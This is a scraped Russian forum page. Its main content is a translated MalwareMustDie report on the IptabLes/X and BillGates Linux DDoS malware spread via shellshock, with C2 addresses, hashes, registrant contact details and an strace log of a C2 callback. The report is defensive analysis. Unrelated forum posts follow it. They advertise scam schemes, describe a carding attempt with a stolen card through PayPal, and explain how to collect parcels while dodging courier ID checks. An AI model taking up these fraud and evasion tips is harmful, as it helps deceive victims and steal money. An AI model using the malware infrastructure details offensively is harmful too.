1 баллВредонос .IptabLex & .IptabLes ELF DDoS malware создан криминальной группировкой China DDoSer и прекрасно себя чувствует на самых различных архитектурах на базе ОС Linux. Троян, появившийся в 2014 году, нацелен на Linux-системы с низким уровнем безопасности и распространяется через уязвимость в протоколе SSH . Так уж сложилось, что впервые вредонос был обнаружен нашей группой (MalwareMustDie) в мае 2014 года и получил имя Linux .Iptablesx|s. На эту тему 15-го июня 2014 года мы выпустили специальную заметку MMD-0025-2014. Поскольку в то время инфекция распространялась настолько быстро, а информации было настолько мало, что 4-го сентября 2014 года нами был создан специальный репозиторий, где выкладывались образцы вредоносов и другие полезные сведения, чтобы сдержать скорость распространения и повысить осведомленность индустрии. В 2014 году троян .IptableS|X поучаствовал в огромном количестве DDoS-атак и в сентябре 2014 года был удостоен вниманием таких уважаемых организаций как Prolexic (ссылка) и Akamai (ссылка). Последняя ссылалась на бюллетень, выпущенный компанией Prolexic. До октября 2014 года вредонос .IptableS / .IptablesX все еще погуливал в дикой природе, но с ноября был вытеснен другими экземплярами троянов от китайских производителей, которые мы также успешно отлавливали. В январе 2015 года мы полагали, что развитие популяции .IptabLes|x полностью прекратилось. Однако 27-го июня 2015 года мой друг @TinkerSec через твиттер рассказал мне о своем подозрении на появление заразы Linux/ChinaZ, после чего состоялась наша душещипательная беседа и анализ находки. Затем член нашей команды обнаружил полезную нагрузку, очень похожую на ранее обнародованные образцы и распространяемую посредством уязвимости shellshock. Я копнул немного поглубже и с удивлением обнаружил, что имею дело с вариацией вредоноса Linux IptableS /.IptablesX. Несколько раз перепроверив свои догадки и разобравшись, почему вначале мне показалось, что я имею дело с вредоносом Linux/ChinaZ, я написал заметку о возобновлении угрозы 2014 года, связанной с DDoS атаками вредоноса IptableS|X. Детали ниже. Shellshock, ChinaZ, .IptabLes|x и BillGates В этом отчете не будет подробного технического анализа образцов вредоноса, поскольку я уже делал это раньше (образцы опубликованы на kernelmode и VirusTotal). Я расскажу о схеме заражения, чтобы прояснить, в чем конкретно заключается угроза. Кроме того, я приведу некоторую информацию, которая может помочь правоохранительным органам добраться до злоумышленников, стоящих за этими атаками. В разное время я получил два независимых отчета о двух случаях атаки при помощи уязвимости shellshock. Еще раз спасибо @tinkersec и @benkow. Рисунок 1: Две попытки атаки через уязвимость shellshock Для более удобного восприятия немного причешем код (мы же не какие-то жулики, а вполне приличные люди). В командах, приведенных выше, есть довольно много знакомых признаков: Рисунок 2: Структурированная версия инфицированной команды В коде указан IP-адрес злоумышленников. В обоих случаях атаки осуществлялись с IP-адреса 58.213.123.107. Сама структура кода довольно типична, когда через User-agent() выполняются команды bash, а прямые GET-команды содержат строки, используемые при эксплуатации уязвимости shellshock. Кроме того, из кода видно, что нехорошие ребята из ChinaZ, кажется, пытаются впарить нам свою полезную нагрузку. Идем дальше. Обе атаки произошли на разных континентах и в разное время (26-го июня и 30-го июня) у двух незнакомых друг с другом людей, однако используемая полезная нагрузка в формате ELF была идентичной. Рисунок 3: Контрольные суммы полезных нагрузок Довольно странно то, что в течение 3 дней полезная нагрузка сохраняла ту же самую контрольную сумму, поскольку в распоряжении создателей вредоноса Linux/ChinaZ находятся исходные тексты и инструменты для сборки. А теперь посмотрите, что еще я нашел в том образце полезной нагрузки: Рисунок 4: Сигнатуры вредоноса Linux/.IptableS|X На рисунке выше показаны сигнатуры вредоноса Linux/.IptableS|X. В исходном коде вредоноса ChinaZ отсутствуют интерактивные команды остановки и перезагрузки IptabLes|x. Смотрите, как кодер пытается сокрыть эти команды внутри настоящей связки команд для остановки сервиса iptables (обратите внимание на разные символы в конце). Это вполне согласуется с наличием команды closefirewall(), предназначенной для остановки службы iptables на компьютере жертвы, чтобы потом можно было заразить систему вредоносом IptabLes|x: Рисунок 5: Содержимое команды closefirewall() Наконец-то многое прояснилось. Но почему злоумышленники так поступили? Почему используется IptabLes|x? Возможны две версии. Либо ребята из ChinaZ начали активно распространять свою первоначальную полезную нагрузку (потому что мы провели глубокий реверс-инжиниринг и опубликовали результаты), либо кто-то пытается от имени ChinaZ распространять вредонос IptablesS|X. Ну, хорошо. Давайте копнем чуть глубже и исследуем панель, используемую в качестве источника заражения. Рисунок 6: Место хранения полезных нагрузок На IP-адресе 202.103.243.104 висит китайская версия модифицированного веб-сервера HFS (хороший и легитимный веб-сервер, который я постоянно использую в своей работе). На сервере хранятся 32- и 64-х битные версии вредоноса Iptables|X, а также вредонос Linux/BillGates ELF DDoS. Обратите внимание на огромное количество (более 4000) загрузок 32-х битной версии, что говорит об эффективности распространения заразы при помощи уязвимости shellshock. На IP-адресе злоумышленника висит бот, пытающийся заразить все возможные сервера на базе ОС Linux. Ниже представлена информация об IP-адресе: 58.213.123.107||4134 | 58.208.0.0/12 | CHINANET | CN | chinatelecom.com.cn ChinaNet Jiangsu Province Network { "ip": "58.213.123.107", "hostname": "No Hostname", "city": "Nanjing", "region": "Jiangsu", "country": "CN", "loc": "32.0617,118.7778", "org": "AS4134 No.31,Jin-rong Street" } Необходимо в кратчайшие сроки остановить атаки с этого IP-адреса. Информация об IP-адресе, на котором находятся полезные нагрузки: 202.103.243.104||4134 | 202.103.192.0/18 | CHINANET | CN | chinatelecom.com.cn ChinaNet Guangxi Province Network { "ip": "202.103.243.104", "hostname": "bbs.gliet.edu.cn", "city": "Guilin", "region": "Guangxi", "country": "CN", "loc": "25.2819,110.2864", "org": "AS4134 No.31,Jin-rong Street" } Оба IP-адреса принадлежат одной и той же организации (AS4134 No.31,Jin-rong Street). Ниже показан домен, на котором висит панель. Это может быть взломанный сервер какого-то образовательного учреждения, либо просто взломанный домен. Рисунок 7: Домен, на котором висит панель с полезными нагрузками Анализ вредоноса Проделанный мной ранее технический анализ во время беседы с @TinkerSec в твиттере полностью корректен, и больше мне добавить нечего. Приведу лишь информацию об управляющем сервере: "domain: v8.f1122.org IP: 61.160.212.172 port 1122 " Информация о сервере получена в ходе исследования вредоноса: Рисунок 8: Информация об управляющем сервере Детальная информация о домене и IP-адресе управляющего сервера Информация об IP-адресе: 61.160.212.172| - |23650 | 61.160.212.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn ChinaNet Jiangsu Province Network { "ip": "61.160.212.172", "hostname": "v8.f1122.org", "city": "Nanjing", "region": "Jiangsu", "country": "CN", "loc": "32.0617,118.7778", "org": "AS23650 AS Number for CHINANET jiangsu province backbone" } Информация о регистрации домена (похоже, что на данный момент домен заблокирован): "Domain Name:F1122.ORG Domain ID: D174941520-LROR Creation Date: 2015-01-03T06:46:16Z Updated Date: 2015-03-05T03:45:24Z Registry Expiry Date: 2016-01-03T06:46:16Z Sponsoring Registrar:GoDaddy.com, LLC (R91-LROR)" Sponsoring Registrar IANA ID: 146 WHOIS Server: Referral URL: Domain Status: clientDeleteProhibited -- http://www.icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited -- http://www.icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited -- http://www.icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited -- http://www.icann.org/epp#clientUpdateProhibited Registrant "ID:CR184376377" Registrant "Name:xihuang li" Registrant Organization: Registrant "Street: shanxishengdatongshibeijie23hao" Registrant "City:shanxishengdatongshi" Registrant "State/Province:shanxisheng" Registrant Postal Code:037000 Registrant Country:CN Registrant "Phone:+86.3522036283" Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant "Email:wendingba@163.com" Электронная почта WENDINGBA@163.COM связана с именем Xihuang Li и пятью другими именами. Общее количество найденных доменов – 1382, большинство из которых зарегистрированы в GoDaddy и ENOM. Ниже показана информация о 20 первых доменах. Рисунок 9: Информация о некоторых доменах, используемых злоумышленниками Вредонос Linux/BillGates ничем не отличается от остальных (можете посмотреть другие наши статьи по этой теме). Ниже показана информация об управляющем сервере: Domain: udp.f1122.org IP: 61.160.213.18 Port: 25001 Обратный вызов к управляющему серверу для загрузки конфигурационного файла: socket(PF_INET, SOCK_STREAM, IPPROTO_IP sendto(5, "W\204\1\0\0\1\0\0\0\0\0\0\3udp\5f1122\3org\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS")}, 16) recvfrom(5, "W\204\201\200\0\1\0\1\0\2\0\n\3udp\5f1122\3org\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS")}, [16]) connect(4, {sa_family=AF_INET, sin_port=htons(25001), sin_addr=inet_addr("61.160.213.18")}, 16) open("/XXXX/conf.n", O_RDWR|O_CREAT, 0644) write(5, "\0\364\1\0\0002\0\0\0\350\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\1\2\0\0\0"..., 69) close(5) Факт установления соединения вредоноса и управляющего сервера: $ date Wed Jul 1 15:25:44 JST 2015 (snips) 28443 28453 txt REG 8,6 1223123 1048605 /sudp 28443 28453 0u CHR 1,3 0t0 1192 /dev/null 28443 28453 1u CHR 1,3 0t0 1192 /dev/null 28443 28453 2u CHR 1,3 0t0 1192 /dev/null 28443 28453 3uW REG 8,1 5 261598 /tmp/gates.lod 28443 28453 4u "IPv4 127246603 0t0 TCP MMD:32977->61.160.213.18:25001 (ESTABLISHED)" Информация о DNS для IP-адреса, указанного выше: ;; QUESTION SECTION: ;udp.f1122.org. IN A ;; ANSWER SECTION: udp.f1122.org. 600 IN A 61.160.213.18 ;; AUTHORITY SECTION: f1122.org. 600 IN NS f1g1ns1.dnspod.net. f1122.org. 600 IN NS f1g1ns2.dnspod.net. ;; ADDITIONAL SECTION: f1g1ns1.dnspod.net. 350 IN A 113.108.80.138 f1g1ns1.dnspod.net. 350 IN A 125.39.208.193 f1g1ns1.dnspod.net. 350 IN A 180.153.9.189 f1g1ns1.dnspod.net. 350 IN A 182.140.167.166 f1g1ns1.dnspod.net. 350 IN A 111.30.132.180 f1g1ns2.dnspod.net. 1015 IN A 115.236.137.40 f1g1ns2.dnspod.net. 1015 IN A 115.236.151.191 f1g1ns2.dnspod.net. 1015 IN A 182.140.167.188 f1g1ns2.dnspod.net. 1015 IN A 101.226.30.224 f1g1ns2.dnspod.net. 1015 IN A 112.90.82.194 Информация об IP-адресе: 61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn ChinaNet Jiangsu Province Network { "ip": "61.160.213.18", "hostname": "udp.f1122.org", "city": "Nanjing", "region": "Jiangsu", "country": "CN", "loc": "32.0617,118.7778", "org": "AS23650 AS Number for CHINANET jiangsu province backbone" } Как и предполагалось, вредонос Linux/BillGates использует тот же самый домен (f1122.org), а IP-адрес находится в той же самой сети, что и управляющий сервер вредоноса IptableS|X. Очевидно, что обоими серверами управляют одни и те же лица. После того как я подсоединился к серверу, соединение тут же было закрыто. В предыдущем отчете о вредоносе ChinaZ мы выяснили, что управляющий сервер был зарегистрирован на электронную почту bm18801463268@163.com. В этот раз использовался адрес wendingba@163.com. Я уверен, что за обоими вредоносами стоят одни и те же люди. Мы связались с администратором домена 163.com, но полученная информация будет сообщена только правоохранительным органам. Доказательства того, что сервер 58.221.254.153 принадлежит ChinaZ Наша команда также нашла подтверждение тому, что IP-адрес 58.221.254.153 связан с вредоносом ChinaZ. Там хранится сборщик ChinaZ (win-приложение), в котором содержится код ChinaZ и код управляющего сервера для ChinaZ. Доказательство #1: сборщик ChinaZ: --> [результаты сканирования Virus Total] Рисунок 10: Содержимое архива сборщика Если запустить сборщик, во вложенных папках начнется поиск бинарных шаблонов под формат ELF (x32 / x64), либо win (x32). Затем появится диалоговое окно с возможностью сборки пакета под нужный IP-адрес. Номер порта фиксированный (29136). В шаблонах используется шифрование, что не позволяет изменить номер порта. Именно поэтому мы понимаем, что злоумышленник – не программист, а простой исполнитель. Рисунок 11: Диалоговое окно сборщика Анализ кода показал, что сборщик работает и не вредит системе. Из-за загруженности на работе я не стал сильно углубляться в детали. Ниже показаны пути, где сборщик ищет шаблоны для компиляции вредоноса. Если путь не найдется, сборщик работать не будет. Рисунок 12: Пути, где сборщик ищет шаблоны Доказательство #2: внутри шаблона используется код ChinaZ: -->[VT] и [VT] Я взял шаблон (ELF x32) «\\Arch32\\DDosClientTemp32», чтобы проверить, присутствует ли там код ChinaZ. В прошлой статье о ChinaZ был выявлен аккаунт на GitHub, который использовался для разработки вредоноса. Наш друг @benkow посоветовал посмотреть соответствия в исходниках и в бинарном файле полезной нагрузки. Ниже показаны некоторые функции и переменные, используемые вредоносом: Рисунок 13: Часть исходного кода вредоноса ChinaZ Некоторые участки исходного кода полностью совпадают со строками в бинарном файле \\Arch32\\DDosClientTemp32 Рисунок 14: Часть строк в бинарном шаблоне совпадает с исходным кодом ChinaZ Доказательство #3: управляющий сервер для ChinaZ -->[VT] В том же архиве был найден софт и лог управляющего сервера: Рисунок 15: Перечень файлов, имеющих отношение к управляющему серверу После запуска исполняемого файла сервер будет ожидать подключения вредоносов на определенном порту: Рисунок 16: Интерфейс управляющего сервера После всех доказательств, приведенных выше, не остается сомнений, что хост 58.221.254.153, при помощи которого заражаются Linux-системы через уязвимость shellshock, имеет прямое отношение людям, использующим ChinaZ. Соответственно, вся информация, имеющая отношение к IP-адресам и серверам, имеет прямое отношение к злоумышленникам. Образцы полезных нагрузок и результаты сканирования в Virus Total Ниже показаны различные версии полезных нагрузок и результаты сканирования в сервисе Virus Total: 1122.32.ELF.IptableX.DDoS 58eefd9183ac89a1b99dda02e0ab4092 1122.64.ELF.IptableX.DDoS 8d18ddc23603726181ebb77931aa11f3 sudp.Elf.BillGates.DDoS 84d431618cbbbf56fe0cc3d34f62a655
-
1 балл
-
1 балл
-
1 баллПродам три уникальные схемы заработка . Не паблик . Схемы серые "очень". Развод людей . Но какой ! Затраты по времени на каждую схему от 1 до 5 дней . Сумма дохода по каждой сделки от 10 до 25 т.р за одну операцию. Подойдёт для каждого региона . Справится любой . Особых навыков не каких не нужно .Максимальные затраты от 1 до 5 т.р Все подробности в аське . Помогу . Подскажу . Обучу . Продажи не ограничены . Цена : 15.000 р . Принимаю к оплате только Киви . Не забываем про свою безопасность в сети . Моя аська 662 382 671. Продажа только через Гаранта . За Ваш счёт.
-
1 баллпокупал у него комплект украины, все меня устроило, так что работать с ним можно.
-
1 баллНу,а если по новостям судить вообще о всем турбизнесе и о каждой отдельной турфирме в частности,то....хе-хе,не проще ли непосредственно именно с работой турфирмы познакомиться поближе?
-
1 баллникто его не ддосит, он прекратил свое существование после ухода оттуда всех модераторов
-
1 балл
-
1 балл
-
1 баллВсё очень просто - зарегал палку, вбил сс (азиатскую), подтвердил ее через минидеп и сделал ордер на 200 евро. Через 5 мин лок, диспут, - в резолюшн центре - подтвердите вашу карту. Нет слов
-
1 балл
-
1 балл
-
1 балл
-
1 баллЧто за бред, зачем палить адрес! При отправке называем любой адрес для ориентира, будь то хоть жилой дом, ТРЦ (адрес) или же офис. Просим позвонить по прибытию или за 15-30 минут. Отправляем. По инструкции любой курьер должен проверить документ, НО на практике в 99.999999% этого не происходит. В случае с получением посылки в большинстве кантор ситуация аналогична! Кто ответил по телефону тот и получатель. Также дается адрес по соседству и дается указание позвонить получателю за час, за 10 минут - как требуют обстоятельства и человек выходит, и забирает спокойно. Документы у получателя попросят только если приедет в офис забирать самовывозом!